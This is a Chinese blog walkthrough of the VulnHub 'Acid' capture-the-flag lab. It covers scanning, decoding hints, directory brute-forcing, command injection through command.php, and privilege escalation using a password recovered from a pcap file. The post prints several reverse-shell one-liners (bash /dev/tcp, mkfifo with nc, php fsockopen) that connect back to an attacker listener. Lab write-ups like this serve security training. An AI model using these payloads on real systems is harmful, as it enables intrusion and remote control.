靶机实战-Acid

最新推荐文章于 2024-06-14 20:00:00 发布
最新推荐文章于 2024-06-14 20:00:00 发布
阅读量793 收藏 3
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43870289/article/details/104087024
版权

Acid靶机实战

文章目录

1、主机发现

在这里插入图片描述
目标主机:192.168.232.160
我是用arp命令扫的,大家可自行选择

2、端口扫描

在这里插入图片描述

3、端口详细信息扫描

在这里插入图片描述

4、访问8080端口

在这里插入图片描述
只有一个文件,点击就会下载,先pass

5、访问33447端口

在这里插入图片描述
查看网页源代码:
在这里插入图片描述
发现一串16进制的数,转化成字符:
在这里插入图片描述
d293LmpwZw==
base64在转化://得到 wow.jpg
在这里插入图片描述
是张图片,找找网站有没有存放图片的路径:
在这里插入图片描述
把/wow.jpg加上看看
在这里插入图片描述
保存图片到本地,查看有没有隐藏什么信息,用Nodepad++打开。发现最后有一些数字,看着像16进制
在这里插入图片描述
然后利用txt把:替换为空
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
到这网页上的东西就解出来了,就一个图片
然后扫一下其它目录://kali中启动DirBuster,暴力破解web目录
在这里插入图片描述
在这里插入图片描述
扫描出来的 /Challenge 目录与上面网页的标题相对应,访问一下:
在这里插入图片描述
访问此目录下的php:
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
发现cake.php中点一下login就会跳转到index.php登录页面,而且标题跟 /Challenge 标题格式是一样的,果断加到url后打开看看:
在这里插入图片描述
根据报错提示说明还是存在这个页面的,继续爆破一下目录看看有没有别的可以访问的页面:
在这里插入图片描述
发现了一个command.php页面,估计是直接命令执行的页面:
在这里插入图片描述
可以执行ping命令,利用bp抓包看看:
在这里插入图片描述
命令可执行,直接反弹shell:
kali开启监听:
在这里插入图片描述
尝试使用bash -i >& /dev/tcp/192.168.232.158/4444 0>&1反弹shell
在这里插入图片描述
不行,改url编码:
在这里插入图片描述
在这里插入图片描述
还是不行…
尝试使用
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.232.158 4444 >/tmp/f
在这里插入图片描述
在这里插入图片描述
也不行…
尝试使用
;php -r ‘$sock=fsockopen(“192.168.232.158”,4444);exec("/bin/sh -i <&3 >&3 2>&3");’
在这里插入图片描述
在这里插入图片描述
点击go之后发现没有回包,去kali查看:
在这里插入图片描述
成功反弹shell

由于反弹shell的姿势多,一个不行就换,需要一个一个尝试

6、提权

查看/etc/passwd文件
在这里插入图片描述
重点关注的用户acid,saman
分别查看用户下的文件:
在这里插入图片描述
在这里插入图片描述
看到了第一条/sbin/raw_vs_isi/hint.pcapng,百度了一下是个能用Wireshark打开的流量抓包文件,下载下来打开看一下:
在这里插入图片描述
报错没有权限,执行su命令
在这里插入图片描述
必须在终端上运行,用python -c启动一个终端:
在这里插入图片描述
然后再执行scp那个命令:
在这里插入图片描述
用Wireshark打开:
在这里插入图片描述
发现用户名saman及密码1337hax0r
提权:
在这里插入图片描述
在这里插入图片描述
提权成功

滕财然
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
渗透测试实战-Fowsniff靶机入侵-附件资源
03-02
渗透测试实战-Fowsniff靶机入侵-附件资源
靶机渗透实战-Acid
qq_46540840的博客
02-04 3184
文章目录 这几天有点事情,靶机方面就没在更新,后边会积极的更新。 文章目录文章目录信息收集漏洞发现利用提权总结 信息收集 信息收集是必不可少的. 首先用自己的kali当攻击机,下载acid靶机 靶机下载地址 首先进行靶机发现 nmap -sn 192.168.240.1。1/24进行主机发现不尽兴端口扫描(128是kali地址) 然后对主机进行端口扫描 nmap -sV -T4 -A -p- 192.168.240.137 其中sV 扫描版本信息和开放的服务 , -A扫描开放端口的具体服务
靶机实战:Funbox10
CHAsichuan的博客
06-14 2181
一次中等难度的靶机超详细版记录
VulnHub渗透测试实战靶场 - ACID: SERVER
LYJ20010728的博客
08-05 857
VulnHub渗透测试实战靶场 - ACID: SERVER环境下载ACID: SERVER靶机搭建渗透测试信息收集漏洞挖掘getshell提权 环境下载 戳此进行环境下载 ACID: SERVER靶机搭建 将下载好的靶机环境,导入VMware,将其网络适配设置为NAT模式,运行即可 渗透测试 信息收集 使用Kali自带的工具netdiscover进行子网探测:sudo netdiscover -r 192.168.246.0/24 用Nmap对获取到的靶机IP地址进行扫描:sudo n
Acid靶场实战
m0_65149086的博客
05-04 370
云尘靶场,靶机渗透,Vulhnub,Acid
靶机渗透实战1:Acid: Server
anbangsi3839的博客
07-12 270
一、准备说明: 攻击机:WMware 中的 Kali Linux 靶机:VMware 中的Acid: Server(下载地址:https://www.vulnhub.com/entry/acid-server,125/) 目标:Escalate the privileges to root and capture the flag 二、信息收集 2.1 查找靶机 IP 地址:...
Acid靶机渗透
weixin_30414155的博客
08-03 103
Acid渗透靶机实战 攻击机:kali 192.168.41.147 靶机: acid 192.168.41.149 信息收集 ip发现 开启Acid靶机,通过nmap进行局域网存火主机扫描.![](https://img2018.cnblogs.com/blog/1357258/201907/1357258-20190725111009774-877137553.pn...
VulnHub渗透测试实战靶场笔记(持续更新)
晚风不及你
03-05 7489
Breach1.0 下载链接 https://download.vulnhub.com/breach/Breach-1.0.zip 靶机说明 Breach1.0是一个难度为初级到中级的BooT2Root/CTF挑战。 VM虚机配置有静态IP地址(192.168.110.140),需要将虚拟机网卡设置为host-only方式组网。非常感谢Knightmare和rastamouse进行测试和提供反馈。...
渗透实战(二)
ZJPC007的博客
12-14 77
攻击机IP:192.168.159.4靶机IP:192.168.159.3。
【火】爆肝1w+字把SQL注入讲的明明白白!
qq_54502707的博客
09-09 1413
Hello大家好~这里是KOKO师傅 SQL注入是Web渗透测试里hin常用的方法,我用1w+字让你入门SQL注入!
靶机GoldenEye-V1练习报告1
08-08
靶机GoldenEye-V1练习报告1
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
pillow_heif-0.17.0-pp39-pypy39_pp73-macosx_14_0_arm64.whl
07-27
基本介绍 名称与起源:Pillow,原名为PIL(Python Imaging Library),但PIL只支持Python 2版本。随着Python 3的普及,Pillow作为PIL的一个分支出现,兼容Python 3并提供更多的功能和改进。 主要功能:Pillow支持多种图像格式的打开、保存、显示以及基本的图像操作和处理,如裁剪、缩放、旋转、翻转、滤镜应用等。 跨平台性:Pillow库可以在不同的操作系统上运行,包括Windows、Linux和MacOS等。 主要功能模块 Pillow库包含多个功能模块,每个模块都提供了特定的图像处理功能。以下是一些常用的模块: Image:用于处理图像文件,提供打开、保存、调整大小、旋转、裁剪、滤镜等功能。 ImageDraw:提供在图像上绘制各种形状(如线条、矩形、圆形)和文本的功能。 ImageFont:用于加载和使用TrueType字体文件,以便在图像上绘制文本时设置字体样式、大小和颜色。 ImageFilter:提供各种滤镜效果,如模糊、锐化、边缘增强等,用于图像增强、特效处理和图像识别等应用。 ImageEnhance:用于调整图像的亮度、对比度、颜色饱和度等参数,使图像更加清晰、明亮或具有特定的调色效果。 高级功能 除了基本的图像处理功能外,Pillow还支持一些高级功能,如色彩空间转换、直方图均衡化等。这些功能可以帮助用户进行更复杂的图像处理和分析。
cykooz.resizer-3.0.0-cp310-cp310-macosx_11_0_arm64.whl
07-27
python库,可以直接安装使用,再也不怕自己pip下载,出现等待超时的现象。欢迎下载使用,使用过程中如有使用问题,请及时与我沟通交流,帮你解决! python库,可以直接安装使用,再也不怕自己pip下载,出现等待超时的现象。欢迎下载使用,使用过程中如有使用问题,请及时与我沟通交流,帮你解决! python库,可以直接安装使用,再也不怕自己pip下载,出现等待超时的现象。欢迎下载使用,使用过程中如有使用问题,请及时与我沟通交流,帮你解决! python库,可以直接安装使用,再也不怕自己pip下载,出现等待超时的现象。欢迎下载使用,使用过程中如有使用问题,请及时与我沟通交流,帮你解决! python库,可以直接安装使用,再也不怕自己pip下载,出现等待超时的现象。欢迎下载使用,使用过程中如有使用问题,请及时与我沟通交流,帮你解决!
[毕设]Delphi题库管理与试卷自动生成系统.zip
最新发布
07-27
[毕设]Delphi题库管理与试卷自动生成系统
131 种水果、蔬菜和坚果的 90380张的高质量图像数据集+图像识别与定位+该数据集相关的研究论文
07-27
<项目介绍> 包含131 种水果、蔬菜和坚果的 90380张的高质量图像数据集+该数据集相关的研究论文。可供深度学习图像识别与定位。 - 训练集大小:67700 个图像 测试集大小:22888 个图像 文件名格式:image_index_100.jpg(例如 32_100.jpg)或 r_image_index_100.jpg(例如 r_32_100.jpg)或 r2_image_index_100.jpg 或 r3_image_index_100.jpg。 “r”代表旋转水果。 “r2”表示水果绕第三轴旋转。 “100”来自图像尺寸(100x100 像素)。 水果是如何拍摄的: 1:使用 C920 摄像机拍摄水果。最好的网络摄像头之一。 2:在水果后面,我们放了一张白纸作为背景。 3:将水果和蔬菜种植在低速电机(3转/分钟)的轴中,并录制一段20秒的短片。 下载后请首先打开README.md文件(如有),仅供学习参考, 切勿用于商业用途。 --------
Matlab实现斑点鬣狗优化算法SHO-CNN-BiLSTM-Mutilhead-Attention多变量时序预测.rar
07-27
1.版本:matlab2014/2019a/2021a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
My-cmsms靶机实战:ARP与Nmap扫描漏洞检测
在本篇vulnhub靶机实战指南中,我们将会深入探讨针对"My-cmsms"靶机实战操作。My-cmsms是一个基于MyCMS搭建的靶机,提供了一系列安全漏洞供网络安全爱好者进行渗透测试和学习。本文档以第26页开始,涵盖了两个关键...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值